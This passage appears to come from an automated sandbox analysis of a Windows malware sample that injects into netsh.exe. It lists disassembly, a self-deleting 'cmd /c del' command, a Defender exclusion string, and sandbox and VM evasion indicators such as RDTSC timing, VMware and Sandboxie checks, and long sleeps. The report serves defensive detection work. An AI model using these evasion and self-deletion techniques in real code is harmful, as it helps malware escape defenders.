          Source: 1.0.cK1g5gckZR9VHjj.exe.2f0000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.7.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.5.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.cK1g5gckZR9VHjj.exe.560000.1.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.2.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.9.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.cK1g5gckZR9VHjj.exe.560000.0.unpack, Biblan/Views/MainWindow.cs | .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 0_2_008E92F5 push ds; ret 0_2_008E9340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 0_2_008E9347 push ds; ret 0_2_008E934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 0_2_008E9361 push ds; retf 0_2_008E9364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 0_2_053856E0 push esp; iretd 0_2_053856E9
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 1_2_002F9361 push ds; retf 1_2_002F9364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 1_2_002F9347 push ds; ret 1_2_002F934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 1_2_002F92F5 push ds; ret 1_2_002F9340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0041B822 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0041B82B push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0041B88C push eax; ret 2_2_0041B892
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_004153E6 push ss; iretd 2_2_004153EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0041541E push ss; iretd 2_2_004153EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0041B7D5 push eax; ret 2_2_0041B828
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_005692F5 push ds; ret 2_2_00569340
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00569347 push ds; ret 2_2_0056934C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00569361 push ds; retf 2_2_00569364
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0103D0D1 push ecx; ret 2_2_0103D0E4
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_0381D0D1 push ecx; ret 12_2_0381D0E4
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DD53E6 push ss; iretd 12_2_02DD53EC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DDB88C push eax; ret 12_2_02DDB892
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DDB82B push eax; ret 12_2_02DDB892
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DDB822 push eax; ret 12_2_02DDB828
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DDB7D5 push eax; ret 12_2_02DDB828
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 12_2_02DD541E push ss; iretd 12_2_02DD53EC
          Source: initial sample | Static PE information: section name: .text entropy: 7.85526570093

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\netsh.exe | Process created: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 0.2.cK1g5gckZR9VHjj.exe.2c38e9c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.cK1g5gckZR9VHjj.exe.2ccaf94.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: cK1g5gckZR9VHjj.exe PID: 7160, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000002DC8604 second address: 0000000002DC860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exe | RDTSC instruction interceptor: First address: 0000000002DC899E second address: 0000000002DC89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556 | Thread sleep count: 1934 > 30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239875s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3556 | Thread sleep count: 1406 > 30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 7164 | Thread sleep time: -36459s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239747s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239639s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239530s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239422s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239296s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239187s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -239047s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238919s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238796s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238672s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238562s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238452s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -238157s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -237500s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -237359s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -237246s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -237139s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -237031s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -236844s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -236344s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -236109s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -235797s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -235468s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 5264 | Thread sleep time: -235355s >= -30000s
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe TID: 3200 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe TID: 4624 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\netsh.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_004088D0 rdtsc 2_2_004088D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239875
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239747
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239639
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239530
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239422
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239296
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239187
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 239047
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238919
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238796
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238672
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238562
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238452
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 238157
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 237500
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 237359
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 237246
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 237139
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 237031
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 236844
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 236344
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 236109
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 235468
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 235355
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Window / User API: threadDelayed 1934
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Window / User API: threadDelayed 1406
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Thread delayed: delay time: 36459
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.389136151.00000000083E0000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.384337460.00000000062E0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp | Binary or memory string: 00000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}||w)
          Source: explorer.exe, 00000005.00000000.367996285.000000000851A000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000005.00000000.367328151.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.389305821.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000005.00000000.407240995.000000000D614000.00000004.00000001.sdmp | Binary or memory string: dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$$w
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Process token adjusted: Debug (2 occurrences)
          Source: C:\Windows\SysWOW64\netsh.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01004120 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01004120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101513A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0100B944 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0100C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01012990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010161A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010651BE mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FFB02A mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01067016 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B4015 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEB1E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101002D mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01000050 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01063884 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEB171 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010120A0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101F0BF mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0107B8D0 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE9100 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FFAAB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE52A5 mov eax, dword ptr fs:[00000030h] (5 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01013B7A mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0109D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01012397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01014BAD mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE9240 mov eax, dword ptr fs:[00000030h] (4 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010653CA mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010103E2 mov eax, dword ptr fs:[00000030h] (6 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEAA16 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE5210 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01003A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01024A2C mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_01074257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0109B260 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_010B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FF1B8F mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101D294 mov eax, dword ptr fs:[00000030h] (2 occurrences)
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 2_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
